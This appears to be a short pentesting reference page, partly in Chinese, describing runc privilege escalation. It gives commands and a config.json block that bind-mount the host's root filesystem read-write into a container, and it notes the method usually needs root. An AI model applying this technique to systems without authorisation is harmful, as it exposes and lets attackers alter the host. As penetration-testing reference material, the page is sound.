RunC Privilege Escalation
基本信息
如果您想了解更多关于 runc 的信息,请查看以下页面:
2375, 2376 Pentesting DockerPE
如果您发现宿主机中安装了 runc
,您可能能够运行一个容器,挂载宿主机的根 / 目录。
runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder
Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},
#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs
# Finally, start the container
# The root folder is the one from the host
runc run demo
这并不总是有效的,因为runc的默认操作是以root身份运行,所以以非特权用户身份运行它根本无法工作(除非你有一个rootless配置)。将rootless配置设置为默认并不是一个好主意,因为在rootless容器内部有很多限制在rootless容器外部不适用。
最后更新于